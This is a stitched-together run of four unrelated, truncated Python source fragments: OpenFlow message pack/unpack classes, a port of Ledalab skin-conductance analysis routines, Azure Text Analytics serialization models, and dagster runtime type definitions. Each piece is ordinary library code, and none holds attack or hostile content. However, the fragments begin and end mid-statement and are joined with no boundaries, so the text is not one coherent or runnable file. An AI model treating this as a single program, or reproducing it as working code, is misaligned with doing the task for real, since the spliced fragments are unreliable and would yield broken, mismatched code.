other.egress_vlan_id: return False if self.if_name != other.if_name: return False return True def pretty_print(self, q): q.text("bsn_vport_q_in_q {") with q.group(): with q.indent(2): q.breakable() q.text("port_no = "); q.text("%#x" % self.port_no) q.text(","); q.breakable() q.text("ingress_tpid = "); q.text("%#x" % self.ingress_tpid) q.text(","); q.breakable() q.text("ingress_vlan_id = "); q.text("%#x" % self.ingress_vlan_id) q.text(","); q.breakable() q.text("egress_tpid = "); q.text("%#x" % self.egress_tpid) q.text(","); q.breakable() q.text("egress_vlan_id = "); q.text("%#x" % self.egress_vlan_id) q.text(","); q.breakable() q.text("if_name = "); q.pp(self.if_name) q.breakable() q.text('}') bsn_vport.subtypes[0] = bsn_vport_q_in_q class bsn_vrf_counter_stats_entry(loxi.OFObject): def __init__(self, vrf=None, values=None): if vrf != None: self.vrf = vrf else: self.vrf = 0 if values != None: self.values = values else: self.values = [] return def pack(self): packed = [] packed.append(struct.pack("!H", 0)) # placeholder for length at index 0 packed.append(b'\x00' * 2) packed.append(struct.pack("!L", self.vrf)) packed.append(loxi.generic_util.pack_list(self.values)) length = sum([len(x) for x in packed]) packed[0] = struct.pack("!H", length) return functools.reduce(lambda x,y: x+y, packed) @staticmethod def unpack(reader): obj = bsn_vrf_counter_stats_entry() _length = reader.read("!H")[0] orig_reader = reader reader = orig_reader.slice(_length, 2) reader.skip(2) obj.vrf = reader.read("!L")[0] obj.values = loxi.generic_util.unpack_list(reader, ofp.common.uint64.unpack) return obj def __eq__(self, other): if type(self) != type(other): return False if self.vrf != other.vrf: return False if self.values != other.values: return False return True def pretty_print(self, q): q.text("bsn_vrf_counter_stats_entry {") with q.group(): with q.indent(2): q.breakable() q.text("vrf = "); q.text("%#x" % self.vrf) q.text(","); q.breakable() q.text("values = "); q.pp(self.values) q.breakable() q.text('}') class bucket(loxi.OFObject): def __init__(self, bucket_id=None, actions=None, properties=None): if bucket_id != None: self.bucket_id = bucket_id else: self.bucket_id = 0 if actions != None: self.actions = actions else: self.actions = [] if properties != None: self.properties = properties else: self.properties = [] return def pack(self): packed = [] packed.append(struct.pack("!H", 0)) # placeholder for len at index 0 packed.append(struct.pack("!H", 0)) # placeholder for action_array_len at index 1 packed.append(struct.pack("!L", self.bucket_id)) packed.append(loxi.generic_util.pack_list(self.actions)) packed[1] = struct.pack("!H", len(packed[-1])) packed.append(loxi.generic_util.pack_list(self.properties)) length = sum([len(x) for x in packed]) packed[0] = struct.pack("!H", length) return functools.reduce(lambda x,y: x+y, packed) @staticmethod def unpack(reader): obj = bucket() _len = reader.read("!H")[0] orig_reader = reader reader = orig_reader.slice(_len, 2) _action_array_len = reader.read("!H")[0] obj.bucket_id = reader.read("!L")[0] obj.actions = loxi.generic_util.unpack_list(reader.slice(_action_array_len), ofp.action.action.unpack) obj.properties = loxi.generic_util.unpack_list(reader, ofp.common.group_bucket_prop.unpack) return obj def __eq__(self, other): if type(self) != type(other): return False if self.bucket_id != other.bucket_id: return False if self.actions != other.actions: return False if self.properties != other.properties: return False return True def pretty_print(self, q): q.text("bucket {") with q.group(): with q.indent(2): q.breakable() q.text("bucket_id = "); value_name_map = {4294967040: 'OFPG_BUCKET_MAX', 4294967293: 'OFPG_BUCKET_FIRST', 4294967294: 'OFPG_BUCKET_LAST', 4294967295: 'OFPG_BUCKET_ALL'} if self.bucket_id in value_name_map: q.text("%s(%d)" % (value_name_map[self.bucket_id], self.bucket_id)) else: q.text("%#x" % self.bucket_id) q.text(","); q.breakable() q.text("actions = "); q.pp(self.actions) q.text(","); q.breakable() q.text("properties = "); q.pp(self.properties) q.breakable() q.text('}') class bucket_counter(loxi.OFObject): def __init__(self, packet_count=None, byte_count=None): if packet_count != None: self.packet_count = packet_count else: self.packet_count = 0 if byte_count != None: self.byte_count = byte_count else: self.byte_count = 0 return def pack(self): packed = [] packed.append(struct.pack("!Q", self.packet_count)) packed.append(struct.pack("!Q", self.byte_count)) return functools.reduce(lambda x,y: x+y, packed) @staticmethod def unpack(reader): obj = bucket_counter() obj.packet_count = reader.read("!Q")[0] obj.byte_count = reader.read("!Q")[0] return obj def __eq__(self, other): if type(self) != type(other): return False if self.packet_count != other.packet_count: return False if self.byte_count != other.byte_count: return False return True def pretty_print(self, q): q.text("bucket_counter {") with q.group(): with q.indent(2): q.breakable() q.text("packet_count = "); q.text("%#x" % self.packet_count) q.text(","); q.breakable() q.text("byte_count = "); q.text("%#x" % self.byte_count) q.breakable() q.text('}') class bundle_features_prop(loxi.OFObject): subtypes = {} def __init__(self, type=None): if type != None: self.type = type else: self.type = 0 return def pack(self): packed = [] packed.append(struct.pack("!H",
""" Ledalab analysis functions (original folder: Ledalab/analyze) """ from __future__ import division import numpy as np from numpy import array as npa import math from scipy import stats from scipy.signal import convolve from scipy import interpolate from scipy.linalg import norm from . import leda2 from . import utils def cgd(start_val, error_fcn, h, crit_error, crit_iter, crit_h): """ Original location: analyze/cg/cgd.m """ x = start_val (newerror, _0) = error_fcn(x) error = npa(newerror) h = npa(h) jiter = 0 while True: olderror = newerror # GET GRADIENT if jiter == 0: gradient = cgd_get_gradient(x, olderror, error_fcn, h) direction = -gradient if len(gradient) == 0: break else: new_gradient = cgd_get_gradient(x, olderror, error_fcn, h) # no conjugation direction = -new_gradient if np.any(direction): # LINESEARCH [x, newerror, step] = cgd_linesearch(x, olderror, direction, error_fcn, h) error_diff = newerror - olderror else: error_diff = 0 # empty gradient error = np.hstack((error, newerror)) if jiter > crit_iter: break if error_diff > -crit_error: # no improvement h = h / 2 if np.all(h < crit_h): break jiter += 1 return (x, error) def cgd_get_gradient(x, error0, error_fcn, h): """ Original location: analyze/cg/cgd_get_gradient.m """ Npars = len(x) gradient = np.zeros(Npars) for i in range(Npars): xc = npa(x) xc[i] = xc[i] + h[i] (error1, _0) = error_fcn(xc) if error1 < error0: gradient[i] = (error1 - error0) else: # try opposite direction xc = npa(x) xc[i] = xc[i] - h[i] (error1, _0) = error_fcn(xc) if error1 < error0: gradient[i] = -(error1 - error0) else: gradient[i] = 0 return gradient def succnz(data, crit, fac, sr): """ Original location: analyze/deconvolution/succnz.m """ n = len(data) abovecrit = np.abs(data) > crit nzidx = np.flatnonzero(np.diff(abovecrit)) + 1 if len(nzidx) == 0: return 0 if abovecrit[0] == 1: nzidx = np.hstack((1, nzidx)) if abovecrit[-1] == 1: nzidx = np.hstack((nzidx, n+1)) nzL = nzidx[np.arange(1, len(nzidx), 2)] - nzidx[np.arange(0, len(nzidx), 2)] return np.sum(pow(nzL / sr, fac) / (n / sr)) def cgd_linesearch(x, error0, direction, error_fcn, h): """ Original location: analyze/cg/cgd_linesearch """ direction_n = direction / norm(direction, 2) error_list = npa(error0) stepsize = h maxSteps = 6 count = 0 factor = npa([0]) for iStep in range(1, maxSteps): factor = np.hstack((factor, pow(2, (iStep - 1)))) xc = x + (direction_n * stepsize) * factor[iStep] (catVal, xc) = error_fcn(xc) # xc may be changed due to limits error_list = np.hstack((error_list, catVal)) if error_list[-1] >= error_list[-2]: # end of decline if iStep == 1: # no success step = 0 error1 = npa(error0) else: # parabolic p = np.polyfit(factor, error_list, 2) fx = np.arange(factor[0], factor[-1] + .1, .1) fy = np.polyval(p, fx) idx = np.argmin(fy) fxm = fx[idx] xcm = x + (direction_n * stepsize) * fxm (error1, xcm) = error_fcn(xcm) # xc may be changed due to limits if error1 < error_list[iStep - 1]: xc = xcm step = fxm else: # finding Minimum did not work xc = x + (direction_n * stepsize) * factor[iStep - 1] # before last point (error1, xc) = error_fcn(xc) # recalculate error in order to check for limits again step = factor[iStep - 1] return (xc, error1, step) count = iStep step = factor[count] error1 = error_list[count] return (xc, error1, step) def segment_driver(data, remd, ndiff, sigc, segmWidth): """ Orignal location: analyze/deconvolution/segment_driver.m """ """ SKIPPING SINCE UNUSED segmOnset = npa([]) segmImpulse = list() segmOversh = list() impMin = npa([]) impMax = npa([]) """ (cccrimin, cccrimax) = utils.get_peaks(data) if len(cccrimax) == 0: return None (minL, maxL) = signpeak(data, cccrimin, cccrimax, sigc) """ SKIPPING SINCE UNUSED - BEWARE THE BUGS (rmdimin, rmdimax) = utils.get_peaks(remd) # get peaks of remainder (rmdimins, rmdimaxs) = deconvolution.signpeak(remd, rmdimin, rmdimax, .005) # get remainder segments # Segments: 12 sec, max 3 sec preceding maximum for i in range(len(maxL)): segm_start = np.maximum(minL[i, 0], maxL[i] - round(segmWidth / 2)) segm_end = np.minimum(segm_start + segmWidth - 1, len(data)) # impulse segm_idx = range(int(segm_start), int(segm_end)) segm_data = npa(data[segm_idx]) segm_idx_above = np.nonzero(segm_idx >= minL[i, 1]) segm_data[segm_idx_above] = 0 segmOnset = np.hstack((segmOnset, segm_start)) segmImpulse.append(segm_data) # overshoot oversh_data = np.zeros(len(segm_idx)) if i < len(maxL): rmi = np.flatnonzero(np.logical_and(rmdimaxs > maxL[i], rmdimaxs < maxL[i + 1])) else: rmi = np.flatnonzero(rmdimaxs > maxL[i]) # no zero overshoots if rmi.size == 0: if i < len(maxL): rmi = np.flatnonzero(np.logical_and(rmdimax > maxL[i], rmdimax < maxL[i + 1])) else: rmi = np.flatnonzero(rmdimax > maxL[i]) rmdimaxs = npa(rmdimax) if rmdimin is not None: rmdimins = np.hstack((rmdimin[:-1], rmdimin[1:])) if rmi.size > 0: rmi = rmi[0] oversh_start = np.maximum(rmdimins[rmi, 0], segm_start) oversh_end = np.minimum(rmdimins[rmi, 1], segm_end) # min(rmdimins(rmi+1), segm_end); oversh_idx = np.arange((oversh_start - segm_start + 1), len(oversh_data) - (segm_end - oversh_end) + 1) oversh_data[oversh_idx] = remd[oversh_start:oversh_end + 1] segmOversh.append(oversh_data) #return (segmOnset, segmImpulse, segmOversh, impMin, impMax) """ return (minL, maxL) def fiterror(data, fit, npar): """ npars = number of unfree parameters with df = n - npar 'MSE' method only supported data and fit must be numpy arrays (row vectors) """ if not isinstance(data, np.ndarray): raise ValueError('data is not a numpy array') if not isinstance(fit, np.ndarray): raise ValueError('fit is not a numpy array') residual = data - fit n = len(data) SSE = np.sum(pow(residual, 2)) return SSE / n def bateman(time, onset, amp, tau1, tau2): """ original location: analyze/template/bateman.m time must be a numpy array """ if not isinstance(time, np.ndarray): time = npa(time) if tau1 < 0 or tau2 < 0: raise ValueError('tau1 or tau2 < 0: ({:f}, {:f})'.format(tau1, tau2)) if tau1 == tau2: raise ValueError('tau1 == tau2 == {:f}'.format(tau1)) conductance = np.zeros(time.shape) rang = np.flatnonzero(time > onset) if len(rang) == 0: return None xr = time[rang] - onset if amp > 0: maxx = tau1 * tau2 * math.log(tau1 / tau2) / (tau1 - tau2) # b' = 0 maxamp = abs(math.exp(-maxx / tau2) - math.exp(-maxx / tau1)) c = amp / maxamp else: # amp == 0: normalized bateman, area(bateman) = 1/sr sr = round(1 / np.mean(np.diff(time))) c = 1 / ((tau2 - tau1) * sr) if tau1 > 0: conductance[rang] = c * (np.exp(-xr / tau2) - np.exp(-xr / tau1)) else: conductance[rang] = c * np.exp(-xr / tau2) return conductance def bateman_gauss(time, onset, amp, tau1, tau2, sigma): """ Original location: analyze/template/bateman_gauss.m """ component = bateman(time, onset, 0, tau1, tau2) if sigma > 0: sr = round(1 / np.mean(np.diff(time))) winwidth2 = int(np.ceil(sr * sigma * 4)) # round half winwidth: 4 SD to each side t = np.arange(1, (winwidth2 * 2 + 2)) # odd number (2*winwidth-half+1) + 2 because of numpy's arange implementation g = stats.norm.pdf(t, winwidth2 + 1, sigma * sr) g = g / np.max(g) * amp bg = convolve(np.hstack(((np.zeros(winwidth2) + 1) * component[0], component, (np.zeros(winwidth2) + 1) * component[-1])), g) component = bg[(winwidth2 * 2): -winwidth2 * 2] return component def trough2peak_analysis(): ds = leda2.data.conductance_smoothData t = leda2.data.time_data (minL, maxL) = utils.get_peaks(ds) minL = minL[:len(maxL)] leda2.trough2peakAnalysis.onset = t[minL] leda2.trough2peakAnalysis.peaktime = t[maxL] leda2.trough2peakAnalysis.onset_idx = minL leda2.trough2peakAnalysis.peaktime_idx = maxL leda2.trough2peakAnalysis.amp = ds[maxL] - ds[minL] def sdeco_interimpulsefit(driver, kernel, minL, maxL): """ Original location > analyze>decomposition>sdeco_interimpulsefit.m all parameters must be numpy arrays """ t = leda2.analysis0.target.t d = leda2.analysis0.target.d sr = leda2.analysis0.target.sr tonicGridSize = leda2.settings.tonicGridSize_sdeco nKernel = len(kernel) # Get inter-impulse data index iif_idx = npa([]) if len(maxL) > 2: for i in range(len(maxL) - 1): gap_idx = np.arange(minL[i, 1], minL[i + 1, 0]) if gap_idx.size == 0: gap_idx = minL[i, 1] iif_idx = np.hstack((iif_idx, gap_idx)) iif_idx = np.hstack((minL[1, 0], iif_idx, np.arange(minL[-1, 1], len(driver) - sr))) else: # no peaks (exept for pre-peak and may last peak) so data represents tonic only, so ise all data for tonic estimation iif_idx = np.flatnonzero(t > 0) iif_idx = [x for x in iif_idx.astype(int)] iif_t = t[iif_idx] iif_data = driver[iif_idx] groundtime = np.hstack((np.arange(0, t[-2], tonicGridSize), t[-1])) if tonicGridSize < 30: tonicGridSize = tonicGridSize * 2 groundlevel = npa([]) for i in range(len(groundtime)): # Select relevant interimpulse time points for tonic estimate at groundtime if i == 0: t_idx = np.logical_and(iif_t <= groundtime[i] + tonicGridSize, iif_t > 1) grid_idx = np.logical_and(t <= groundtime[i] + tonicGridSize, t > 1) elif i +
Required. Number of transactions for the request. :type transactions_count: long """ _validation = { 'documents_count': {'required': True}, 'valid_documents_count': {'required': True}, 'erroneous_documents_count': {'required': True}, 'transactions_count': {'required': True}, } _attribute_map = { 'documents_count': {'key': 'documentsCount', 'type': 'int'}, 'valid_documents_count': {'key': 'validDocumentsCount', 'type': 'int'}, 'erroneous_documents_count': {'key': 'erroneousDocumentsCount', 'type': 'int'}, 'transactions_count': {'key': 'transactionsCount', 'type': 'long'}, } def __init__( self, **kwargs ): super(RequestStatistics, self).__init__(**kwargs) self.documents_count = kwargs['documents_count'] self.valid_documents_count = kwargs['valid_documents_count'] self.erroneous_documents_count = kwargs['erroneous_documents_count'] self.transactions_count = kwargs['transactions_count'] class SentenceAspect(msrest.serialization.Model): """SentenceAspect. All required parameters must be populated in order to send to Azure. :param sentiment: Required. Aspect level sentiment for the aspect in the sentence. Possible values include: "positive", "mixed", "negative". :type sentiment: str or ~azure.ai.textanalytics.v3_1_preview_3.models.TokenSentimentValue :param confidence_scores: Required. Aspect level sentiment confidence scores for the aspect in the sentence. :type confidence_scores: ~azure.ai.textanalytics.v3_1_preview_3.models.AspectConfidenceScoreLabel :param offset: Required. The aspect offset from the start of the sentence. :type offset: int :param length: Required. The length of the aspect. :type length: int :param text: Required. The aspect text detected. :type text: str :param relations: Required. The array of either opinion or aspect object which is related to the aspect. :type relations: list[~azure.ai.textanalytics.v3_1_preview_3.models.AspectRelation] """ _validation = { 'sentiment': {'required': True}, 'confidence_scores': {'required': True}, 'offset': {'required': True}, 'length': {'required': True}, 'text': {'required': True}, 'relations': {'required': True}, } _attribute_map = { 'sentiment': {'key': 'sentiment', 'type': 'str'}, 'confidence_scores': {'key': 'confidenceScores', 'type': 'AspectConfidenceScoreLabel'}, 'offset': {'key': 'offset', 'type': 'int'}, 'length': {'key': 'length', 'type': 'int'}, 'text': {'key': 'text', 'type': 'str'}, 'relations': {'key': 'relations', 'type': '[AspectRelation]'}, } def __init__( self, **kwargs ): super(SentenceAspect, self).__init__(**kwargs) self.sentiment = kwargs['sentiment'] self.confidence_scores = kwargs['confidence_scores'] self.offset = kwargs['offset'] self.length = kwargs['length'] self.text = kwargs['text'] self.relations = kwargs['relations'] class SentenceOpinion(msrest.serialization.Model): """SentenceOpinion. All required parameters must be populated in order to send to Azure. :param sentiment: Required. Opinion level sentiment for the aspect in the sentence. Possible values include: "positive", "mixed", "negative". :type sentiment: str or ~azure.ai.textanalytics.v3_1_preview_3.models.TokenSentimentValue :param confidence_scores: Required. Opinion level sentiment confidence scores for the aspect in the sentence. :type confidence_scores: ~azure.ai.textanalytics.v3_1_preview_3.models.AspectConfidenceScoreLabel :param offset: Required. The opinion offset from the start of the sentence. :type offset: int :param length: Required. The length of the opinion. :type length: int :param text: Required. The aspect text detected. :type text: str :param is_negated: Required. The indicator representing if the opinion is negated. :type is_negated: bool """ _validation = { 'sentiment': {'required': True}, 'confidence_scores': {'required': True}, 'offset': {'required': True}, 'length': {'required': True}, 'text': {'required': True}, 'is_negated': {'required': True}, } _attribute_map = { 'sentiment': {'key': 'sentiment', 'type': 'str'}, 'confidence_scores': {'key': 'confidenceScores', 'type': 'AspectConfidenceScoreLabel'}, 'offset': {'key': 'offset', 'type': 'int'}, 'length': {'key': 'length', 'type': 'int'}, 'text': {'key': 'text', 'type': 'str'}, 'is_negated': {'key': 'isNegated', 'type': 'bool'}, } def __init__( self, **kwargs ): super(SentenceOpinion, self).__init__(**kwargs) self.sentiment = kwargs['sentiment'] self.confidence_scores = kwargs['confidence_scores'] self.offset = kwargs['offset'] self.length = kwargs['length'] self.text = kwargs['text'] self.is_negated = kwargs['is_negated'] class SentenceSentiment(msrest.serialization.Model): """SentenceSentiment. All required parameters must be populated in order to send to Azure. :param text: Required. The sentence text. :type text: str :param sentiment: Required. The predicted Sentiment for the sentence. Possible values include: "positive", "neutral", "negative". :type sentiment: str or ~azure.ai.textanalytics.v3_1_preview_3.models.SentenceSentimentValue :param confidence_scores: Required. The sentiment confidence score between 0 and 1 for the sentence for all classes. :type confidence_scores: ~azure.ai.textanalytics.v3_1_preview_3.models.SentimentConfidenceScorePerLabel :param offset: Required. The sentence offset from the start of the document. :type offset: int :param length: Required. The length of the sentence. :type length: int :param aspects: The array of aspect object for the sentence. :type aspects: list[~azure.ai.textanalytics.v3_1_preview_3.models.SentenceAspect] :param opinions: The array of opinion object for the sentence. :type opinions: list[~azure.ai.textanalytics.v3_1_preview_3.models.SentenceOpinion] """ _validation = { 'text': {'required': True}, 'sentiment': {'required': True}, 'confidence_scores': {'required': True}, 'offset': {'required': True}, 'length': {'required': True}, } _attribute_map = { 'text': {'key': 'text', 'type': 'str'}, 'sentiment': {'key': 'sentiment', 'type': 'str'}, 'confidence_scores': {'key': 'confidenceScores', 'type': 'SentimentConfidenceScorePerLabel'}, 'offset': {'key': 'offset', 'type': 'int'}, 'length': {'key': 'length', 'type': 'int'}, 'aspects': {'key': 'aspects', 'type': '[SentenceAspect]'}, 'opinions': {'key': 'opinions', 'type': '[SentenceOpinion]'}, } def __init__( self, **kwargs ): super(SentenceSentiment, self).__init__(**kwargs) self.text = kwargs['text'] self.sentiment = kwargs['sentiment'] self.confidence_scores = kwargs['confidence_scores'] self.offset = kwargs['offset'] self.length = kwargs['length'] self.aspects = kwargs.get('aspects', None) self.opinions = kwargs.get('opinions', None) class SentimentConfidenceScorePerLabel(msrest.serialization.Model): """Represents the confidence scores between 0 and 1 across all sentiment classes: positive, neutral, negative. All required parameters must be populated in order to send to Azure. :param positive: Required. :type positive: float :param neutral: Required. :type neutral: float :param negative: Required. :type negative: float """ _validation = { 'positive': {'required': True}, 'neutral': {'required': True}, 'negative': {'required': True}, } _attribute_map = { 'positive': {'key': 'positive', 'type': 'float'}, 'neutral': {'key': 'neutral', 'type': 'float'}, 'negative': {'key': 'negative', 'type': 'float'}, } def __init__( self, **kwargs ): super(SentimentConfidenceScorePerLabel, self).__init__(**kwargs) self.positive = kwargs['positive'] self.neutral = kwargs['neutral'] self.negative = kwargs['negative'] class SentimentResponse(msrest.serialization.Model): """SentimentResponse. All required parameters must be populated in order to send to Azure. :param documents: Required. Sentiment analysis per document. :type documents: list[~azure.ai.textanalytics.v3_1_preview_3.models.DocumentSentiment] :param errors: Required. Errors by document id. :type errors: list[~azure.ai.textanalytics.v3_1_preview_3.models.DocumentError] :param statistics: if showStats=true was specified in the request this field will contain information about the request payload. :type statistics: ~azure.ai.textanalytics.v3_1_preview_3.models.RequestStatistics :param model_version: Required. This field indicates which model is used for scoring. :type model_version: str """ _validation = { 'documents': {'required': True}, 'errors': {'required': True}, 'model_version': {'required': True}, } _attribute_map = { 'documents': {'key': 'documents', 'type': '[DocumentSentiment]'}, 'errors': {'key': 'errors', 'type': '[DocumentError]'}, 'statistics': {'key': 'statistics', 'type': 'RequestStatistics'}, 'model_version': {'key': 'modelVersion', 'type': 'str'}, } def __init__( self, **kwargs ): super(SentimentResponse, self).__init__(**kwargs) self.documents = kwargs['documents'] self.errors = kwargs['errors'] self.statistics = kwargs.get('statistics', None) self.model_version = kwargs['model_version'] class TasksStateTasks(msrest.serialization.Model): """TasksStateTasks. All required parameters must be populated in order to send to Azure. :param details: :type details: ~azure.ai.textanalytics.v3_1_preview_3.models.TaskState :param completed: Required. :type completed: int :param failed: Required. :type failed: int :param in_progress: Required. :type in_progress: int :param total: Required. :type total: int :param entity_recognition_tasks: :type entity_recognition_tasks: list[~azure.ai.textanalytics.v3_1_preview_3.models.TasksStateTasksEntityRecognitionTasksItem] :param entity_recognition_pii_tasks: :type entity_recognition_pii_tasks: list[~azure.ai.textanalytics.v3_1_preview_3.models.TasksStateTasksEntityRecognitionPiiTasksItem] :param key_phrase_extraction_tasks: :type key_phrase_extraction_tasks: list[~azure.ai.textanalytics.v3_1_preview_3.models.TasksStateTasksKeyPhraseExtractionTasksItem] """ _validation = { 'completed': {'required': True}, 'failed': {'required': True}, 'in_progress': {'required': True}, 'total': {'required': True}, } _attribute_map = { 'details': {'key': 'details', 'type': 'TaskState'}, 'completed': {'key': 'completed', 'type': 'int'}, 'failed': {'key': 'failed', 'type': 'int'}, 'in_progress': {'key': 'inProgress', 'type': 'int'}, 'total': {'key': 'total', 'type': 'int'}, 'entity_recognition_tasks': {'key': 'entityRecognitionTasks', 'type': '[TasksStateTasksEntityRecognitionTasksItem]'}, 'entity_recognition_pii_tasks': {'key': 'entityRecognitionPiiTasks', 'type': '[TasksStateTasksEntityRecognitionPiiTasksItem]'}, 'key_phrase_extraction_tasks': {'key': 'keyPhraseExtractionTasks', 'type': '[TasksStateTasksKeyPhraseExtractionTasksItem]'}, } def __init__( self, **kwargs ): super(TasksStateTasks, self).__init__(**kwargs) self.details = kwargs.get('details', None) self.completed = kwargs['completed'] self.failed = kwargs['failed'] self.in_progress = kwargs['in_progress'] self.total = kwargs['total'] self.entity_recognition_tasks = kwargs.get('entity_recognition_tasks', None) self.entity_recognition_pii_tasks = kwargs.get('entity_recognition_pii_tasks', None) self.key_phrase_extraction_tasks = kwargs.get('key_phrase_extraction_tasks', None) class TaskState(msrest.serialization.Model): """TaskState. All required parameters must be populated in order to send to Azure. :param last_update_date_time: Required. :type last_update_date_time: ~datetime.datetime :param name: :type name: str :param status: Required. Possible values include: "notStarted", "running", "succeeded", "failed", "rejected", "cancelled", "cancelling", "partiallyCompleted". :type status: str or ~azure.ai.textanalytics.v3_1_preview_3.models.State """ _validation = { 'last_update_date_time': {'required': True}, 'status': {'required': True}, } _attribute_map = { 'last_update_date_time': {'key': 'lastUpdateDateTime', 'type': 'iso-8601'}, 'name': {'key': 'name', 'type': 'str'}, 'status': {'key': 'status', 'type': 'str'}, } def __init__( self, **kwargs ): super(TaskState, self).__init__(**kwargs) self.last_update_date_time = kwargs['last_update_date_time'] self.name = kwargs.get('name', None) self.status = kwargs['status'] class TasksStateTasksDetails(TaskState): """TasksStateTasksDetails. All required parameters must be populated in order to send to Azure. :param last_update_date_time: Required. :type last_update_date_time: ~datetime.datetime :param name: :type name: str :param status: Required. Possible values include: "notStarted", "running", "succeeded", "failed", "rejected", "cancelled", "cancelling", "partiallyCompleted". :type status: str or ~azure.ai.textanalytics.v3_1_preview_3.models.State """ _validation = { 'last_update_date_time': {'required': True}, 'status': {'required': True}, } _attribute_map = { 'last_update_date_time': {'key': 'lastUpdateDateTime', 'type': 'iso-8601'}, 'name': {'key': 'name', 'type': 'str'}, 'status': {'key': 'status', 'type': 'str'}, } def __init__( self, **kwargs ): super(TasksStateTasksDetails, self).__init__(**kwargs) class TasksStateTasksEntityRecognitionPiiTasksItem(TaskState, Components15X8E9LSchemasTasksstatePropertiesTasksPropertiesEntityrecognitionpiitasksItemsAllof1): """TasksStateTasksEntityRecognitionPiiTasksItem. All required parameters must be populated in order to send to Azure. :param results: Required. :type results: ~azure.ai.textanalytics.v3_1_preview_3.models.PiiResult :param last_update_date_time: Required. :type last_update_date_time: ~datetime.datetime :param name: :type name: str :param status: Required. Possible values include: "notStarted", "running", "succeeded", "failed", "rejected", "cancelled", "cancelling", "partiallyCompleted". :type status: str or ~azure.ai.textanalytics.v3_1_preview_3.models.State """ _validation = { 'results': {'required': True}, 'last_update_date_time': {'required': True}, 'status': {'required': True}, } _attribute_map = { 'results': {'key': 'results', 'type': 'PiiResult'}, 'last_update_date_time': {'key': 'lastUpdateDateTime', 'type': 'iso-8601'}, 'name':
<gh_stars>0 import typing from functools import partial import six from dagster import check from dagster.core.storage.type_storage import TypeStoragePlugin from .builtin_config_schemas import BuiltinSchemas from .builtin_enum import BuiltinEnum from .config import List as ConfigList from .config import Nullable as ConfigNullable from .config_schema import InputHydrationConfig, OutputMaterializationConfig from .dagster_type import check_dagster_type_param from .field_utils import Dict from .marshal import PickleSerializationStrategy, SerializationStrategy from .typing_api import ( is_closed_python_dict_type, is_closed_python_set_type, is_closed_python_tuple_type, ) from .wrapping import WrappingListType, WrappingNullableType class RuntimeType(object): ''' The class backing DagsterTypes as they are used during execution. ''' def __init__( self, key, name, is_builtin=False, description=None, input_hydration_config=None, output_materialization_config=None, serialization_strategy=None, auto_plugins=None, ): type_obj = type(self) if type_obj in RuntimeType.__cache: check.failed( ( '{type_obj} already in cache. You **must** use the inst() class method ' 'to construct RuntimeType and not the ctor'.format(type_obj=type_obj) ) ) self.key = check.str_param(key, 'key') self.name = check.opt_str_param(name, 'name') self.description = check.opt_str_param(description, 'description') self.input_hydration_config = check.opt_inst_param( input_hydration_config, 'input_hydration_config', InputHydrationConfig ) self.output_materialization_config = check.opt_inst_param( output_materialization_config, 'output_materialization_config', OutputMaterializationConfig, ) self.serialization_strategy = check.opt_inst_param( serialization_strategy, 'serialization_strategy', SerializationStrategy, PickleSerializationStrategy(), ) auto_plugins = check.opt_list_param(auto_plugins, 'auto_plugins', of_type=type) check.param_invariant( all( issubclass(auto_plugin_type, TypeStoragePlugin) for auto_plugin_type in auto_plugins ), 'auto_plugins', ) self.auto_plugins = auto_plugins self.is_builtin = check.bool_param(is_builtin, 'is_builtin') __cache = {} @classmethod def inst(cls): if cls not in RuntimeType.__cache: RuntimeType.__cache[cls] = cls() # pylint: disable=E1120 return RuntimeType.__cache[cls] @staticmethod def from_builtin_enum(builtin_enum): check.invariant(BuiltinEnum.contains(builtin_enum), 'must be member of BuiltinEnum') return _RUNTIME_MAP[builtin_enum] @property def display_name(self): return self.name def type_check(self, value): pass @property def is_any(self): return False @property def is_scalar(self): return False @property def is_list(self): return False @property def is_nullable(self): return False @property def inner_types(self): return [] @property def is_nothing(self): return False class BuiltinScalarRuntimeType(RuntimeType): def __init__(self, *args, **kwargs): name = type(self).__name__ super(BuiltinScalarRuntimeType, self).__init__( key=name, name=name, is_builtin=True, *args, **kwargs ) @property def is_scalar(self): return True class Int(BuiltinScalarRuntimeType): def __init__(self): super(Int, self).__init__( input_hydration_config=BuiltinSchemas.INT_INPUT, output_materialization_config=BuiltinSchemas.INT_OUTPUT, ) def type_check(self, value): from dagster.core.definitions.events import Failure if not isinstance(value, six.integer_types): raise Failure(_typemismatch_error_str(value, 'int')) def _typemismatch_error_str(value, expected_type_desc): return 'Value "{value}" of python type "{python_type}" must be a {type_desc}.'.format( value=value, python_type=type(value).__name__, type_desc=expected_type_desc ) def _throw_if_not_string(value): from dagster.core.definitions.events import Failure if not isinstance(value, six.string_types): raise Failure(_typemismatch_error_str(value, 'string')) class String(BuiltinScalarRuntimeType): def __init__(self): super(String, self).__init__( input_hydration_config=BuiltinSchemas.STRING_INPUT, output_materialization_config=BuiltinSchemas.STRING_OUTPUT, ) def type_check(self, value): _throw_if_not_string(value) class Path(BuiltinScalarRuntimeType): def __init__(self): super(Path, self).__init__( input_hydration_config=BuiltinSchemas.PATH_INPUT, output_materialization_config=BuiltinSchemas.PATH_OUTPUT, ) def type_check(self, value): _throw_if_not_string(value) class Float(BuiltinScalarRuntimeType): def __init__(self): super(Float, self).__init__( input_hydration_config=BuiltinSchemas.FLOAT_INPUT, output_materialization_config=BuiltinSchemas.FLOAT_OUTPUT, ) def type_check(self, value): from dagster.core.definitions.events import Failure if not isinstance(value, float): raise Failure(_typemismatch_error_str(value, 'float')) class Bool(BuiltinScalarRuntimeType): def __init__(self): super(Bool, self).__init__( input_hydration_config=BuiltinSchemas.BOOL_INPUT, output_materialization_config=BuiltinSchemas.BOOL_OUTPUT, ) def type_check(self, value): from dagster.core.definitions.events import Failure if not isinstance(value, bool): raise Failure(_typemismatch_error_str(value, 'bool')) class Anyish(RuntimeType): def __init__( self, key, name, input_hydration_config=None, output_materialization_config=None, is_builtin=False, description=None, ): super(Anyish, self).__init__( key=key, name=name, input_hydration_config=input_hydration_config, output_materialization_config=output_materialization_config, is_builtin=is_builtin, description=description, ) @property def is_any(self): return True class Any(Anyish): def __init__(self): super(Any, self).__init__( key='Any', name='Any', input_hydration_config=BuiltinSchemas.ANY_INPUT, output_materialization_config=BuiltinSchemas.ANY_OUTPUT, is_builtin=True, ) def define_any_type(name, description=None): class NamedAnyType(Anyish): def __init__(self): super(NamedAnyType, self).__init__(key=name, name=name, description=description) return NamedAnyType class Nothing(RuntimeType): def __init__(self): super(Nothing, self).__init__( key='Nothing', name='Nothing', input_hydration_config=None, output_materialization_config=None, is_builtin=True, ) @property def is_nothing(self): return True def type_check(self, value): from dagster.core.definitions.events import Failure if value is not None: raise Failure('Value {value} must 